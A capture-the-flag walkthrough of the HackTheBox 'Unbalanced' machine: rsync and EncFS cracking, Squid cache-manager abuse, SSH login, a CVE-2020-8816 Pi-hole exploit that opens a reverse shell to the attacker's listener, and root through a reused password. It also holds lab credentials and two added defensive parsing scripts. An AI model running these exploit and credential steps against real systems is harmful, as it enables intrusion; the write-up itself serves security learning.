UNBALANCED HACKTHEBOX WRITEUP

NMAP SCANS

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-07 12:49 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:49
Completed NSE at 12:49, 0.00s elapsed
Initiating NSE at 12:49
Completed NSE at 12:49, 0.00s elapsed
Initiating NSE at 12:49
Completed NSE at 12:49, 0.00s elapsed
Initiating Ping Scan at 12:49
Scanning 10.10.10.200 [4 ports]
Completed Ping Scan at 12:49, 0.48s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:49
Scanning intranet.unbalanced.htb (10.10.10.200) [1000 ports]
Discovered open port 22/tcp on 10.10.10.200
Discovered open port 873/tcp on 10.10.10.200
Discovered open port 3128/tcp on 10.10.10.200
Completed SYN Stealth Scan at 12:49, 13.69s elapsed (1000 total ports)
Initiating Service scan at 12:49
Scanning 3 services on intranet.unbalanced.htb (10.10.10.200)
Completed Service scan at 12:52, 198.68s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against intranet.unbalanced.htb (10.10.10.200)
adjust_timeouts2: packet supposedly had rtt of -943567 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -943567 microseconds.  Ignoring time.
Retrying OS detection (try #2) against intranet.unbalanced.htb (10.10.10.200)
Initiating Traceroute at 12:53
Completed Traceroute at 12:53, 1.79s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 12:53
Completed Parallel DNS resolution of 2 hosts. at 12:53, 1.74s elapsed
NSE: Script scanning 10.10.10.200.
Initiating NSE at 12:53
Completed NSE at 12:53, 41.20s elapsed
Initiating NSE at 12:53
Completed NSE at 12:53, 4.36s elapsed
Initiating NSE at 12:53
Completed NSE at 12:53, 0.00s elapsed
Nmap scan report for intranet.unbalanced.htb (10.10.10.200)
Host is up (0.86s latency).
Not shown: 977 closed ports
PORT      STATE    SERVICE        VERSION
22/tcp    open     ssh            OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a2:76:5c:b0:88:6f:9e:62:e8:83:51:e7:cf:bf:2d:f2 (RSA)
|   256 d0:65:fb:f6:3e:11:b1:d6:e6:f7:5e:c0:15:0c:0a:77 (ECDSA)
|_  256 5e:2b:93:59:1d:49:28:8d:43:2c:c1:f7:e3:37:0f:83 (ED25519)
100/tcp   filtered newacct
541/tcp   filtered uucp-rlogin
873/tcp   open     rsync?
1007/tcp  filtered unknown
1022/tcp  filtered exp2
1322/tcp  filtered novation
2000/tcp  filtered cisco-sccp
2040/tcp  filtered lam
2160/tcp  filtered apc-2160
2251/tcp  filtered dif-port
3128/tcp  open     http-proxy     Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
3546/tcp  filtered unknown
3551/tcp  filtered apcupsd
5510/tcp  filtered secureidprop
6667/tcp  filtered irc
7106/tcp  filtered unknown
8089/tcp  filtered unknown
8899/tcp  filtered ospf-lite
9500/tcp  filtered ismserver
32771/tcp filtered sometimes-rpc5
52869/tcp filtered unknown
54328/tcp filtered unknown
Aggressive OS guesses: Linux 2.6.32 (95%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 15.187 days (since Thu Jul 23 08:24:14 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 23/tcp)
HOP RTT       ADDRESS
1   777.99 ms 10.10.14.1
2   778.17 ms intranet.unbalanced.htb (10.10.10.200)

NSE: Script Post-scanning.
Initiating NSE at 12:53
Completed NSE at 12:53, 0.00s elapsed
Initiating NSE at 12:53
Completed NSE at 12:53, 0.00s elapsed
Initiating NSE at 12:53
Completed NSE at 12:53, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 285.84 seconds
           Raw packets sent: 1632 (75.040KB) | Rcvd: 1252 (63.479KB)

ADDING DOMAINS TO /etc/hosts

unbalanced.htb

intranet.unbalanced.htb

Let's go to this domain first.

Nothing here works so far!!!

ENUMERATING RSYNC PORT 873

HELPFUL LINK

https://medium.com/@minimalist.ascent/enumerating-rsync-servers-with-examples-cc3718e8e2c0

Listing the directories we can access or sync

┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #rsync -rdt rsync://10.10.10.200:873
conf_backups   	EncFS-encrypted configuration backups

Downloading and enumerating further

┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #rsync -rdt rsync://10.10.10.200:873/conf_backups conf_backups
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #ls
conf_backups
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #cd conf_backups/
┌─[root@liquid]─[~/Desktop/HTB/unbalanced/conf_backups]
└──╼ #ls
0K72OfkNRRx3-f0Y6eQKwnjn                        jIY9q65HMBxJqUW48LJIc,Fj
27FonaNT2gnNc3voXuKWgEFP4sE9mxg0OZ96NB0x4OcLo-  Kb-,NDTgYevHOGdHCYsSQhhIHrUGjiM6i2JZcl,-PKAJm0
2VyeljxHWrDX37La6FhUGIJS                        kdJ5whfqyrkk6avAhlX-x0kh
3cdBkrRF7R5bYe1ZJ0KYy786                        kheep9TIpbbdwNSfmNU1QNk-
3E2fC7coj5,XQ8LbNXVX9hNFhsqCjD-g3b-7Pb5VJHx3C1  Kpo3MHQxksW2uYX79XngQu-f
3xB4vSQH-HKVcOMQIs02Qb9,                        KPYfvxIoOlrRjTY18zi8Wne-
4J8k09nLNFsb7S-JXkxQffpbCKeKFNJLk6NRQmI11FazC1  KtFc,DR7HqmGdPOkM2CpLaM9
5-6yZKVDjG4n-AMPD65LOpz6-kz,ae0p2VOWzCokOwxbt,  l,LY6YoFepcaLg67YoILNGg0
5FTRnQDoLdRfOEPkrhM2L29P                        lWiv4yDEUfliy,Znm17Al41zi0BbMtCbN8wK4gHc333mt,
5IUA28wOw0wwBs8rP5xjkFSs                        mMGincizgMjpsBjkhWq-Oy0D
6R1rXixtFRQ5c9ScY8MBQ1Rg                        Mv5TtpmUNnVl-fgqQeYAy8uu
7-dPsi7efZRoXkZ5oz1AxVd-Q,L05rofx0Mx8N2dQyUNA,  MxgjShAeN6AmkH2tQAsfaj6C
7zivDbWdbySIQARaHlm3NbC-7dUYF-rpYHSQqLNuHTVVN1  Ni8LDatT134DF6hhQf5ESpo5
8CBL-MBKTDMgB6AT2nfWfq-e                        Nlne5rpWkOxkPNC15SEeJ8g,
8e6TAzw0xs2LVxgohuXHhWjM                        OFG2vAoaW3Tvv1X2J5fy4UV8
8XDA,IOhFFlhh120yl54Q0da                        oPu0EVyHA6,KmoI1T,LTs83x
9F9Y,UITgMo5zsWaP1TwmOm8EvDCWwUZurrL0TwjR,Gxl0  OvBqims-kvgGyJJqZ59IbGfy
A4qOD1nvqe9JgKnslwk1sUzO                        pfTT,nZnCUFzyPPOeX9NwQVo
a4zdmLrBYDC24s9Z59y-Pwa2                        pn6YPUx69xqxRXKqg5B5D2ON
Acv0PEQX8vs-KdK307QNHaiF                        q5RFgoRK2Ttl3U5W8fjtyriX
B6J5M3OP0X7W25ITnaZX753T                        qeHNkZencKDjkr3R746ZzO5K
c9w3APbCYWfWLsq7NFOdjQpA                        sfT89u8dsEY4n99lNsUFOwki
,CBjPJW4EGlcqwZW4nmVqBA6                        sNiR-scp-DZrXHg4coa9KBmZ
Chlsy5ahvpl5Q0o3hMyUIlNwJbiNG99DxXJeR5vXXFgHC1  StlxkG05UY9zWNHBhXxukuP9
cwJnkiUiyfhynK2CvJT7rbUrS3AEJipP7zhItWiLcRVSA1  TZGfSHeAM42o9TgjGUdOSdrd
dF2GU58wFl3x5R7aDE6QEnDj                        uEtPZwC2tjaQELJmnNRTCLYU
dNTEvgsjgG6lKBr8ev8Dw,p7                        vCsXjR1qQmPO5g3P3kiFyO84
ECXONXBBRwhb5tYOIcjjFZzh                        VQjGnKU1puKhF6pQG1aah6rc
F4F9opY2nhVVnRgiQ,OUs-Y0                        W5,ILrUB4dBVW-Jby5AUcGsz
FGZsMmjhKz7CJ2r-OjxkdOfKdEip4Gx2vCDI24GXSF5eB1  waEzfb8hYE47wHeslfs1MvYdVxqTtQ8XGshJssXMmvOsZLhtJWWRX31cBfhdVygrCV5
-FjZ6-6,Fa,tMvlDsuVAO7ek                        Wr0grx0GnkLFl8qT3L0CyTE6
FSXWRSwW6vOvJ0ExPK0fXJ6F                        X93-uArUSTL,kiJpOeovWTaP
gK5Z2BBMSh9iFyCFfIthbkQ6                        Ya30M5le2NKbF6rD-qD3M-7t
gRhKiGIEm4SvYkTCLlOQPeh-                        Yw0UEJYKN,Hjf-QGqo3WObHy
hqZXaSCJi-Jso02DJlwCtYoz                        Z8,hYzUjW0GnBk1JP,8ghCsC
iaDKfUAHJmdqTDVZsmCIS,Bn                        ZvkMNEBKPRpOHbGoefPa737T
IymL3QugM,XxLuKEdwJJOOpi                        ZXUUpn9SCTerl0dinZQYwxrx
┌─[root@liquid]─[~/Desktop/HTB/unbalanced/conf_backups]
└──╼ #

After some googling I came to know about a file called .encfs6.xml, which stores the password material for this decryption method.

Here we found this file, and the password data it stores is what we will crack next.

We cannot just search for this hash online because it is salted, so we need to use john (with its encfs2john.py helper) to crack it.

┌─[root@liquid]─[~/Desktop/HTB/unbalanced/conf_backups]
└──╼ #python /opt/metasploit/john/bin/encfs2john.py . > ../hash
┌─[root@liquid]─[~/Desktop/HTB/unbalanced/conf_backups]
└──╼ #cd ..
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #ls
conf_backups  hash
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #cat hash 
.:$encfs$192*580280*0*20*99176a6e4d96c0b32bad9d4feb3d8e425165f105*44*1b2a580dea6cda1aedd96d0b72f43de132b239f51c224852030dfe8892da2cad329edc006815a3e84b887add
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #

Cracking the hash

I have already cracked the password, so I will just use the --show command:

┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #locate encfs2john
/opt/metasploit/john/bin/encfs2john.py
/usr/share/john/encfs2john.py
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #python /usr/share/john/encfs2john.py conf_backups/ > file.hash
┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #john --show file.hash 
conf_backups/:bubblegum

1 password hash cracked, 0 left

Now we mount the files and enumerate them; EncFS decrypts the folder on the fly, so to read it we have to mount it.

https://linuxconfig.org/how-to-encrypt-directory-with-encfs-on-debian-9-stretch

┌─[root@liquid]─[~]
└──╼ #encfs ~/Desktop/HTB/unbalanced/conf_backups/ ~/decrypted-data/
EncFS Password: 
┌─[root@liquid]─[~]
└──╼ #cd decrypted-data/
┌─[root@liquid]─[~/decrypted-data]
└──╼ #ls
50-localauthority.conf              hdparm.conf                      parser.conf
50-nullbackend.conf                 host.conf                        protect-links.conf
51-debian-sudo.conf                 initramfs.conf                   reportbug.conf
70debconf                           input.conf                       resolv.conf
99-sysctl.conf                      journald.conf                    resolved.conf
access.conf                         kernel-img.conf                  rsyncd.conf
adduser.conf                        ldap.conf                        rsyslog.conf
bluetooth.conf                      ld.so.conf                       semanage.conf
ca-certificates.conf                libaudit.conf                    sepermit.conf
com.ubuntu.SoftwareProperties.conf  libc.conf                        sleep.conf
dconf                               limits.conf                      squid.conf
debconf.conf                        listchanges.conf                 sysctl.conf
debian.conf                         logind.conf                      system.conf
deluser.conf                        logrotate.conf                   time.conf
dhclient.conf                       main.conf                        timesyncd.conf
discover-modprobe.conf              mke2fs.conf                      ucf.conf
dkms.conf                           modules.conf                     udev.conf
dns.conf                            namespace.conf                   update-initramfs.conf
dnsmasq.conf                        network.conf                     user.conf
docker.conf                         networkd.conf                    user-dirs.conf
fakeroot-x86_64-linux-gnu.conf      nsswitch.conf                    Vendor.conf
framework.conf                      org.freedesktop.PackageKit.conf  wpa_supplicant.conf
fuse.conf                           PackageKit.conf                  x86_64-linux-gnu.conf
gai.conf                            pam.conf                         xattr.conf
group.conf                          pam_env.conf

Here we check squid.conf, since the Squid proxy port (3128) is open.

Data we found in that file:

Here we got an IP and a password, which we use below.

If we google cachemgr_passwd we get a number of links, but the helpful one I used is this:

http://etutorials.org/Server+Administration/Squid.+The+definitive+guide/Chapter+14.+Monitoring+Squid/14.2+The+Cache+Manager/

After going through it, we try this command:

┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:fqdncache

This returns the FQDN cache statistics and contents:

┌─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:fqdncache
HTTP/1.1 200 OK
Server: squid/4.6
Mime-Version: 1.0
Date: Sat, 08 Aug 2020 17:50:41 GMT
Content-Type: text/plain;charset=utf-8
Expires: Sat, 08 Aug 2020 17:50:41 GMT
Last-Modified: Sat, 08 Aug 2020 17:50:41 GMT
X-Cache: MISS from unbalanced
X-Cache-Lookup: MISS from unbalanced:3128
Via: 1.1 unbalanced (squid/4.6)
Connection: close

FQDN Cache Statistics:
FQDNcache Entries In Use: 19
FQDNcache Entries Cached: 14
FQDNcache Requests: 25674
FQDNcache Hits: 0
FQDNcache Negative Hits: 13844
FQDNcache Misses: 11830
FQDN Cache Contents:

Address                                       Flg TTL Cnt Hostnames
10.10.14.154                                   N  055   0
127.0.1.1                                       H -001   2 unbalanced.htb unbalanced
::1                                             H -001   3 localhost ip6-localhost ip6-loopback
172.31.179.2                                    H -001   1 intranet-host2.unbalanced.htb
172.31.179.3                                    H -001   1 intranet-host3.unbalanced.htb
10.10.10.200                                   N  -15303   0
127.0.0.1                                       H -001   1 localhost
172.17.0.1                                      H -001   1 intranet.unbalanced.htb
ff02::1                                         H -001   1 ip6-allnodes
ff02::2                                         H -001   1 ip6-allrouters
10.10.16.8                                     N  -49408   0
10.10.14.110                                   N  -4338   0
10.10.14.69                                    N  -9212   0
10.10.16.85                                    N  -2885   0

BEFORE GOING THROUGH ANY PAGE, ADD THIS MACHINE'S IP AND THE SQUID PROXY PORT TO YOUR PROXY SETUP: IP 10.10.10.200 AND PORT 3128, JUST AS WE DID FOR BURP WITH 127.0.0.1 AND PORT 8080.

Here we got two IPs (172.31.179.2 and 172.31.179.3) under the same domain we found in the nmap results.
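The cache-manager report above is plain text, so a reviewer assessing what a leaked cachemgr_passwd exposes would parse it rather than read it by eye. The following is an added example, not code from the original writeup; the sample input is constructed from the entries shown above and the helper names are my own:

```python
"""Parse Squid's mgr:fqdncache report into structured records.
Added example, not from the original writeup: turns the cache-manager text above
into records and lists the internal hosts a single report discloses, which is how
a reviewer assesses what a leaked cachemgr_passwd exposes. Sample is constructed.
"""
import ipaddress
import re
from typing import Dict, List, NamedTuple, Tuple

STAT_RE = re.compile(r"^(FQDNcache [A-Za-z ]+?):\s+(\d+)$")
# Address  Flg (H = hit, N = negative)  TTL  Cnt  Hostnames...
ENTRY_RE = re.compile(r"^(\S+)\s+([HN])\s+(-?\d+)\s+(\d+)\s*(.*)$")

class FqdnEntry(NamedTuple):
    address: str
    negative: bool      # N: the reverse lookup failed, no names cached
    ttl: int
    hostnames: List[str]

def parse_fqdncache(text: str) -> Tuple[Dict[str, int], List[FqdnEntry]]:
    stats: Dict[str, int] = {}
    entries: List[FqdnEntry] = []
    in_table = False
    for line in text.splitlines():
        line = line.rstrip()
        if not in_table:
            m = STAT_RE.match(line)
            if m:
                stats[m.group(1)] = int(m.group(2))
            in_table = line.startswith("Address")  # column header opens the table
            continue
        m = ENTRY_RE.match(line)
        if m:
            addr, flag, ttl, _cnt, names = m.groups()
            entries.append(FqdnEntry(addr, flag == "N", int(ttl), names.split()))
    return stats, entries

def disclosed_internal_hosts(entries: List[FqdnEntry]) -> Dict[str, List[str]]:
    """Cached names for private, non-loopback addresses: the internal topology
    (here the Docker-side intranet hosts) an outsider learns from one report."""
    out: Dict[str, List[str]] = {}
    for e in entries:
        ip = ipaddress.ip_address(e.address)
        if e.hostnames and ip.is_private and not ip.is_loopback:
            out[e.address] = e.hostnames
    return out

# Constructed from the report above (HTTP headers omitted).
SAMPLE = """\
FQDNcache Entries In Use: 19
FQDNcache Hits: 0
FQDN Cache Contents:

Address                                       Flg TTL Cnt Hostnames
10.10.14.154                                   N  055   0
127.0.1.1                                       H -001   2 unbalanced.htb unbalanced
::1                                             H -001   3 localhost ip6-localhost ip6-loopback
172.31.179.2                                    H -001   1 intranet-host2.unbalanced.htb
172.31.179.3                                    H -001   1 intranet-host3.unbalanced.htb
172.17.0.1                                      H -001   1 intranet.unbalanced.htb
"""

if __name__ == "__main__":
    stats, entries = parse_fqdncache(SAMPLE)
    print(stats, disclosed_internal_hosts(entries))
```

The mitigation side is the same finding read the other way: the cache manager should not be reachable with a password that also sits in an rsync-exposed backup.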

LOGIN TO WEBPAGE

Here we use SQL injection payloads in the login form.

This gives us some users:

Let's create a list of these users and try to get the passwords for them.

The passwords we got are!!

Here I had to take help from someone to get this done, but I did it 🙂

bryan :: ireallyl0vebubblegum!!!

GETTING USER ACCESS

bryan :: ireallyl0vebubblegum!!!

┌─[✗]─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #ssh bryan@10.10.10.200
bryan@10.10.10.200's password: 
Linux unbalanced 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Aug  8 13:12:09 2020 from 10.10.15.58
bryan@unbalanced:~$ id
uid=1000(bryan) gid=1000(bryan) groups=1000(bryan)
bryan@unbalanced:~$ cat user.txt 
12840aaf879e39d87975c0e927539458
bryan@unbalanced:~$ 

There is also another file named TODO:

bryan@unbalanced:~$ cat TODO 
############
# Intranet #
############
* Install new intranet-host3 docker [DONE]
* Rewrite the intranet-host3 code to fix Xpath vulnerability [DONE]
* Test intranet-host3 [DONE]
* Add intranet-host3 to load balancer [DONE]
* Take down intranet-host1 and intranet-host2 from load balancer (set as quiescent, weight zero) [DONE]
* Fix intranet-host2 [DONE]
* Re-add intranet-host2 to load balancer (set default weight) [DONE]
- Fix intranet-host1 [TODO]
- Re-add intranet-host1 to load balancer (set default weight) [TODO]

###########
# Pi-hole #
###########
* Install Pi-hole docker (only listening on 127.0.0.1) [DONE]
* Set temporary admin password [DONE]
* Create Pi-hole configuration script [IN PROGRESS]
- Run Pi-hole configuration script [TODO]
- Expose Pi-hole ports to the network [TODO]
bryan@unbalanced:~$ 

I tried LinPEAS but got nothing.

I went to check with netstat, which was not installed, but there is an alternative for that:

https://staaldraad.github.io/2017/12/20/netstat-without-netstat/

bryan@unbalanced:~$ awk 'function hextodec(str,ret,n,i,k,c){
>     ret = 0
>     n = length(str)
>     for (i = 1; i <= n; i++) {
>         c = tolower(substr(str, i, 1))
>         k = index("123456789abcdef", c)
>         ret = ret * 16 + k
>     }
>     return ret
> }
> function getIP(str,ret){
>     ret=hextodec(substr(str,index(str,":")-2,2)); 
>     for (i=5; i>0; i-=2) {
>         ret = ret"."hextodec(substr(str,i,2))
>     }
>     ret = ret":"hextodec(substr(str,index(str,":")+1,4))
>     return ret
> } 
> NR > 1 {{if(NR==2)print "Local - Remote";local=getIP($2);remote=getIP($3)}{print local" - "remote}}' /proc/net/tcp 
Local - Remote
0.0.0.0:873 - 0.0.0.0:0
127.0.0.1:8080 - 0.0.0.0:0
127.0.0.1:5553 - 0.0.0.0:0
0.0.0.0:53 - 0.0.0.0:0
0.0.0.0:22 - 0.0.0.0:0
10.10.10.200:22 - 10.10.14.149:54896
10.10.10.200:22 - 10.10.14.132:40326
10.10.10.200:22 - 10.10.15.58:58698
127.0.0.1:8080 - 127.0.0.1:43034
172.31.0.1:43408 - 172.31.11.3:80
127.0.0.1:43034 - 127.0.0.1:8080
10.10.10.200:22 - 10.10.14.154:46330
bryan@unbalanced:~$ 
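As an added example (not part of the original writeup), the same /proc/net/tcp decoding in Python, extended to IPv6 (tcp6), socket state and owning uid, so a host without netstat or ss can still be audited for what is listening and to whom it talks. The sample input is constructed to mirror the sockets seen above; all function names are my own:

```python
"""Parse /proc/net/tcp and tcp6 without netstat or ss.
Added example, not from the original writeup: a Python equivalent of the awk
one-liner above, extended to IPv6, socket state and owning uid. The sample
is constructed to mirror the sockets seen on the box.
"""
import socket
import struct
from typing import List, NamedTuple, Tuple

# Socket state codes from the kernel's include/net/tcp_states.h
TCP_STATES = {"01": "ESTABLISHED", "02": "SYN_SENT", "03": "SYN_RECV",
              "04": "FIN_WAIT1", "05": "FIN_WAIT2", "06": "TIME_WAIT",
              "07": "CLOSE", "08": "CLOSE_WAIT", "09": "LAST_ACK",
              "0A": "LISTEN", "0B": "CLOSING"}

class Sock(NamedTuple):
    local: str
    remote: str
    state: str
    uid: int

def decode_addr(field: str) -> str:
    """'0100007F:1F90' -> '127.0.0.1:8080'. The kernel prints each 32-bit word
    of the address in host (little-endian) byte order, one word for IPv4 and
    four for IPv6; the port is plain big-endian hex."""
    ip_hex, port_hex = field.split(":")
    words = [int(ip_hex[i:i + 8], 16) for i in range(0, len(ip_hex), 8)]
    raw = b"".join(struct.pack("<I", w) for w in words)
    family = socket.AF_INET if len(raw) == 4 else socket.AF_INET6
    ip = socket.inet_ntop(family, raw)
    host = f"[{ip}]" if family == socket.AF_INET6 else ip
    return f"{host}:{int(port_hex, 16)}"

def parse_proc_net_tcp(text: str) -> List[Sock]:
    """Columns: sl local rem st tx:rx tr:when retrnsmt uid timeout inode ..."""
    socks = []
    for line in text.splitlines()[1:]:  # first row is the column header
        f = line.split()
        if len(f) >= 8:
            socks.append(Sock(decode_addr(f[1]), decode_addr(f[2]),
                              TCP_STATES.get(f[3], f[3]), int(f[7])))
    return socks

def listeners(socks: List[Sock]) -> List[str]:
    return sorted(s.local for s in socks if s.state == "LISTEN")

def established(socks: List[Sock]) -> List[Tuple[str, str]]:
    return [(s.local, s.remote) for s in socks if s.state == "ESTABLISHED"]

# Constructed sample in /proc/net/tcp layout (trailing kernel fields trimmed).
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0369 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18001
   1: 0100007F:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18002
   2: 0100007F:15B1 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18003
   3: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18004
   4: C80A0A0A:0016 840E0A0A:9D86 01 00000000:00000000 02:000A1B2C 00000000     0        0 18005
   5: 01001FAC:A990 030B1FAC:0050 01 00000000:00000000 00:00000000 00000000    33        0 18006
"""

if __name__ == "__main__":
    socks = parse_proc_net_tcp(SAMPLE)  # live: open("/proc/net/tcp").read()
    print("listening:", listeners(socks))
    print("established:", established(socks))
```

Loopback-only listeners such as 127.0.0.1:8080 are exactly the services a host inventory should flag, since they are invisible from the outside but reachable by anyone with a local shell.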

Here we have two more listening ports: 8080 and 5553.

Let's enumerate these ports.

bryan@unbalanced:~$ curl http://127.0.0.1:5553
^C
bryan@unbalanced:~$ curl http://127.0.0.1:8080
[ERROR]: Unable to parse results from <i>queryads.php</i>: <code>Unhandled error message (<code>Invalid domain!</code>)</code>

Port 5553 gave no response, but port 8080 was asking for a domain!

bryan@unbalanced:~$ curl http://127.0.0.1:8080 -H 'Host: unbalanced'
<!DOCTYPE html>
<!-- Pi-hole: A black hole for Internet advertisements
*  (c) 2017 Pi-hole, LLC (https://pi-hole.net)
*  Network-wide ad blocking via your own hardware.
*
*  This file is copyright under the latest version of the EUPL. -->

<----->


      <input id="bpWLPassword" type="password" placeholder="Javascript disabled" disabled/><button id="bpWhitelist" type="button" disabled></button>
    </form>
  </div>
</main>

<footer><span>Saturday 6:12 PM, August 08th.</span> Pi-hole v4.3.2-0-ge41c4b5 (pihole.unbalanced.htb/172.31.11.3)</footer>
</div>

<script>
  function add() {
    $("#bpOutput").removeClass("hidden error exception");
    $("#bpOutput").addClass("add");
    var domain = "unbalanced";
    var pw = $("#bpWLPassword");


<----->


Here we got the IP (172.31.11.3) and Pi-hole running on it with version 4.3.2, which is vulnerable to RCE (CVE-2020-8816).

So let's get that done!! The TODO list also gave us some hints about this setup.

The script we will be using is this:

https://github.com/AndreyRainchik/CVE-2020-8816/blob/master/CVE-2020-8816.py

To make it work we need to run the script from our own machine, so we first have to forward port 8080 to our machine.

┌─[✗]─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #ssh -NL 8080:127.0.0.1:8080 bryan@10.10.10.200
bryan@10.10.10.200's password: 

With the port forwarded, let's run the script:

┌─[✗]─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #python3 exploitpihole.py http://127.0.0.1:8080 admin 10.10.14.132 9001
Attempting to verify if Pi-hole version is vulnerable
Logging in...
Login succeeded
Grabbing CSRF token
Attempting to read $PATH
Pihole is vulnerable and served's $PATH allows PHP
Sending payload


LISTENING ON PORT

┌─[✗]─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.132] from (UNKNOWN) [10.10.10.200] 47558
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
/var/www/html/admin
$ hostname
pihole.unbalanced.htb
$ 


GETTING ROOT ACCESS

Here I was able to read the files in the root directory of this host:

$ cd /root	
pwd
$ /root
$ pwd
/root
$ ls
ph_install.sh
pihole_config.sh
$ cat pihole_config.sh
#!/bin/bash

# Add domains to whitelist
/usr/local/bin/pihole -w unbalanced.htb
/usr/local/bin/pihole -w rebalanced.htb

# Set temperature unit to Celsius
/usr/local/bin/pihole -a -c

# Add local host record
/usr/local/bin/pihole -a hostrecord pihole.unbalanced.htb 127.0.0.1

# Set privacy level
/usr/local/bin/pihole -a -l 4

# Set web admin interface password
/usr/local/bin/pihole -a -p 'bUbBl3gUm$43v3Ry0n3!'

# Set admin email
/usr/local/bin/pihole -a email admin@unbalanced.htb
$ 

Here I got another password, so I just tried it for root and it worked.

┌─[✗]─[root@liquid]─[~/Desktop/HTB/unbalanced]
└──╼ #ssh bryan@10.10.10.200
bryan@10.10.10.200's password: 
Linux unbalanced 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Aug  8 14:04:13 2020 from 10.10.14.132
bryan@unbalanced:~$ id
uid=1000(bryan) gid=1000(bryan) groups=1000(bryan)
bryan@unbalanced:~$ su root
Password: 
root@unbalanced:/home/bryan# id
uid=0(root) gid=0(root) groups=0(root)
root@unbalanced:/home/bryan# cd /root
root@unbalanced:~# ls
root.txt
root@unbalanced:~# cat root.txt 
a00801226119423990cecfe56f7b39c1
root@unbalanced:~# 

And there is our root flag!!

This machine was difficult for me during the Squid proxy part.

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
